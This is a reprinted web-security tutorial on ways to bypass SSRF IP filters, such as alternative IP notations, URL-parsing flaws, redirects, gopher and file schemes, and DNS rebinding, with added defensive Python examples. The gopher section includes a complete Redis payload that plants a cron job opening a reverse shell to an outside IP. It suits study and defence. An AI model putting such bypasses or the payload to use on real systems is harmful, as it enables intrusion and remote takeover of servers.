Methods of Bypassing IP Restrictions in SSRF

I. SSRF Overview

SSRF (Server-Side Request Forgery): put simply, we can forge a request that is initiated by the server itself, and thereby obtain data that the client could not reach directly. The main reason an SSRF vulnerability arises is that an interface provided by the server takes a URL parameter naming the content to be requested, and that URL parameter is passed through without being filtered. The harm this vulnerability causes includes:

(1) Scanning, from the outside, the internal network where the server sits and the server's local ports, and collecting banner information from some services;
(2) Attacking applications running on the internal network or on the local host (for example via overflows);
(3) Fingerprinting internal web applications by requesting their default files;
(4) Attacking web applications inside and outside the network, mainly with attacks that can be carried out through GET parameters (such as Struts2 vulnerabilities, SQL injection, etc.);
(5) Reading local files through the file protocol.


The usual defense is to filter the URL parameter, or to make the URL parameter not controllable by the user.

II. Several Methods of Bypassing SSRF Filtering

The addresses 192.168.0.1 and 10.0.0.1 that appear below are all addresses on the server's internal network.

1. Changing the IP address notation

Some developers filter out internal-network IPs by running a regular expression match against the URL parameter that was passed in, for example with the following regular expressions:

^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$

^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$

To bypass this kind of filter we can use alternative notations for the IP address. For example, the address 192.168.0.1 can be rewritten as:

(1) octal form: 0300.0250.0.1

(2) hexadecimal form: 0xC0.0xA8.0.1

(3) decimal integer form: 3232235521

(4) hexadecimal integer form: 0xC0A80001

There is also a special abbreviated form: for example, the IP 10.0.0.1 can be written as 10.1.
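As an added illustration (not code from the original article), the following script runs the article's three regular expressions against the alternative spellings above and contrasts them with a check that first canonicalises the string through the C library's inet_aton, which accepts the same octal, hexadecimal, integer and short forms that the filter misses. The assumption is a Python environment whose libc implements inet_aton in the usual BSD way (glibc and musl both do).

```python
import ipaddress
import re
import socket

# The three regular expressions from the article, used as a blocklist.
PRIVATE_IP_REGEXES = [
    re.compile(r"^10(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){3}$"),
    re.compile(r"^172\.([1][6-9]|[2]\d|3[01])(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$"),
    re.compile(r"^192\.168(\.([2][0-4]\d|[2][5][0-5]|[01]?\d?\d)){2}$"),
]


def regex_blocklist_rejects(host: str) -> bool:
    """The weak check: only dotted-decimal spellings of the private ranges match."""
    return any(r.match(host) for r in PRIVATE_IP_REGEXES)


def canonical_ip(host: str):
    """Normalise any notation inet_aton accepts (octal or hex octets, a plain
    32-bit integer, the short '10.1' form) to an IPv4Address object.
    Returns None when the string is not an IP literal at all."""
    try:
        packed = socket.inet_aton(host)
    except OSError:
        return None
    return ipaddress.ip_address(socket.inet_ntoa(packed))


def hardened_rejects(host: str) -> bool:
    """Canonicalise first, then reject anything that is not a public address
    (private, loopback, link-local and unspecified ranges all fail is_global)."""
    ip = canonical_ip(host)
    if ip is None:
        return False  # not an IP literal: resolve the name and check the result
    return not ip.is_global


# The article's four rewrites of 192.168.0.1, plus the short form of 10.0.0.1.
ALTERNATE_SPELLINGS = ["0300.0250.0.1", "0xC0.0xA8.0.1", "3232235521", "0xC0A80001", "10.1"]


def compare_filters(hosts=ALTERNATE_SPELLINGS):
    """Return {spelling: (regex rejects?, hardened rejects?, canonical form)}."""
    return {h: (regex_blocklist_rejects(h), hardened_rejects(h), str(canonical_ip(h)))
            for h in hosts}


if __name__ == "__main__":
    for host, (weak, strong, canon) in compare_filters().items():
        print(f"{host:>14} -> {canon:<12} regex blocks: {weak!s:5} hardened blocks: {strong}")
```

Every one of the five spellings slips past the regular expressions and is caught after canonicalisation.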

2. Exploiting URL parsing problems

In some cases the back-end program parses the URL to be accessed and filters on the host address it extracts. If the URL parameter is parsed incorrectly, this filter can be bypassed.

If the back-end program parses such a URL with an incorrect regular expression (for example one that treats everything after http:// up to the .com, here www.baidu.com, as the host being requested), it will very likely conclude that the URL points at the host www.baidu.com, when in fact the content this URL requests lives on 192.168.0.1.
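As an added example (not from the original article), the snippet below contrasts the naive "http:// up to .com" extraction with a real URL parser. The sample URL is constructed here and is an assumption about the shape the article has in mind: the expected name is placed in the user-info part before "@", so the authority's actual host is 192.168.0.1.

```python
import re
from urllib.parse import urlsplit

# Constructed example URL (not from the article): "www.baidu.com" is only the
# user-info component; the host the client will connect to is 192.168.0.1.
CONSTRUCTED_URL = "http://www.baidu.com@192.168.0.1/admin"

# The kind of incorrect host extraction the article describes: everything from
# "http://" up to the first ".com" is taken to be the host.
NAIVE_HOST_RE = re.compile(r"^https?://(.*?\.com)")


def naive_host(url: str):
    """Return the host the flawed regular expression believes is being requested."""
    m = NAIVE_HOST_RE.match(url)
    return m.group(1) if m else None


def parsed_host(url: str):
    """Use the standard URL parser instead: .hostname is the authority's host
    component with user-info and port already stripped, which is what the
    HTTP client will actually connect to."""
    return urlsplit(url).hostname


if __name__ == "__main__":
    print("naive :", naive_host(CONSTRUCTED_URL))    # www.baidu.com
    print("parsed:", parsed_host(CONSTRUCTED_URL))   # 192.168.0.1
```

The host returned by the parser is the value that must be fed into the IP check, not the output of a hand-written regular expression.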

3. Using 302 redirects

If the back-end server correctly parses the host out of the URL after receiving the parameter and filters on it, we can use a 302 redirect to bypass the filter.

(1) There is a very handy service on the Internet, http://xip.io: when we visit a subdomain of this site, such as 192.168.0.1.xip.io, it is automatically redirected to 192.168.0.1.

(2) The method above still contains the IP address 192.168.0.1, which the regular expression may filter out; this can be bypassed by using a short URL. Testing showed that the Sina and Baidu URL-shortening services do not support IP addresses, so the short-URL service provided by http://tinyurl.com is used here, as shown below:

Similarly, we can also write our own redirect endpoint to achieve the same effect.

4. Using various non-HTTP protocols:

If the server-side program does not check the protocol (scheme) of the URL being accessed, the filter can be bypassed by using a non-HTTP protocol.

(1) The gopher protocol: we construct a POST or GET request inside the URL parameter using gopher, in order to attack applications on the internal network. For example, the gopher protocol can be used to attack an internal Redis service with a URL such as the following:


gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >& /dev/tcp/172.19.23.228/23330>&1%0a%0a%0a%0a%0a%0d%0a%0d%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$16%0d%0a/var/spool/cron/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$4%0d%0aroot%0d%0a*1%0d%0a$4%0d%0asave%0d%0aquit%0d%0a


(2) The file protocol: the file protocol is mainly used to access files on the local computer; a path of the form file:/// reaches a local file path on that machine. The file protocol therefore sidesteps the IP filtering the server-side program applies to the addresses it accesses. For example, file:///d:/1.txt reads the contents of 1.txt on the D drive.

5. DNS Rebinding

For the common IP restriction, the back-end server may filter IPs with the following flow:

For the URL parameter requested by the user, the server first performs a DNS resolution on it, then checks the IP address returned by the DNS server; if it is on the blacklist, the request is rejected.

However, within this whole process there is a time gap between the first DNS resolution of the domain name and the second step in which the server requests the URL. Exploiting this time gap, we can carry out a DNS rebinding attack.

To carry out a DNS rebinding attack we need a domain name, with its resolution delegated to a DNS server we control; on that controllable DNS server we write the resolution service and set the TTL to 0. The attack can then proceed, and the complete attack flow is:

(1) The server obtains the URL parameter and performs the first DNS resolution, obtaining a non-internal IP.

(2) The obtained IP is checked; it is not a blacklisted IP, so validation passes.

(3) The server accesses the URL; because the DNS server set the TTL to 0, DNS resolution is performed again, and this time the DNS server returns an internal-network address.

(4) Since validation has already been bypassed, the server returns the result of accessing the internal resource.
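As an added example (not from the original article), the simulation below replays the four-step flow with a constructed resolver that answers like the TTL-0 DNS server described: a public IP on the first lookup, an internal one afterwards. It shows the "validate, then let the HTTP client resolve again" flow connecting to 192.168.0.1, and the hardened flow that resolves once, validates that answer and pins the connection to it. The domain "rebind.example" and the connect function are placeholders.

```python
import ipaddress
from typing import Callable, List


class RebindingResolver:
    """Constructed stand-in for the attacker's TTL-0 DNS server: answers are
    handed out in order, so lookup 1 gets a public IP and lookup 2 an internal one."""

    def __init__(self, answers: List[str]):
        self._answers = list(answers)
        self.lookups = 0

    def resolve(self, hostname: str) -> str:
        idx = min(self.lookups, len(self._answers) - 1)
        self.lookups += 1
        return self._answers[idx]


def is_internal(ip: str) -> bool:
    """Blacklist check on an already-resolved address (private, loopback, link-local...)."""
    return not ipaddress.ip_address(ip).is_global


def vulnerable_fetch(hostname: str, resolver: RebindingResolver,
                     connect: Callable[[str, str], str]) -> str:
    """The flow from the article: validate the first answer, then let the HTTP
    client resolve the name a second time when it actually connects."""
    if is_internal(resolver.resolve(hostname)):      # step 1 + 2
        return "rejected"
    return connect(resolver.resolve(hostname), hostname)  # step 3: re-resolved


def pinned_fetch(hostname: str, resolver: RebindingResolver,
                 connect: Callable[[str, str], str]) -> str:
    """Hardened flow: resolve exactly once, validate that answer, and connect to
    that same IP while sending the original name in the Host header."""
    ip = resolver.resolve(hostname)
    if is_internal(ip):
        return "rejected"
    return connect(ip, hostname)


def fake_connect(ip: str, host_header: str) -> str:
    """Placeholder for the real HTTP client; only reports where it connected."""
    return f"connected to {ip} (Host: {host_header})"


def demo() -> dict:
    """Run both flows against a fresh rebinding resolver and return where each connected."""
    results = {}
    for name, fetch in (("vulnerable", vulnerable_fetch), ("pinned", pinned_fetch)):
        resolver = RebindingResolver(["93.184.216.34", "192.168.0.1"])
        results[name] = fetch("rebind.example", resolver, fake_connect)
    return results
```

The same resolve-validate-pin step has to be repeated for every hop of a 302 redirect (method 3 above), since each redirect target is a new URL with its own name to resolve.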


III. Summary

In general, the reason the server-side check can be bypassed is that the validation of the URL is flawed at the moment the server requests the resource. Besides the known methods listed above there may well be others, but they all come back to the same root cause. At the same time, developers should filter with a whitelist wherever possible during development, which guarantees security to a much greater degree.


Reprinted from: https://www.freebuf.com/articles/web/135342.html


Origin www.cnblogs.com/iAmSoScArEd/p/11458850.html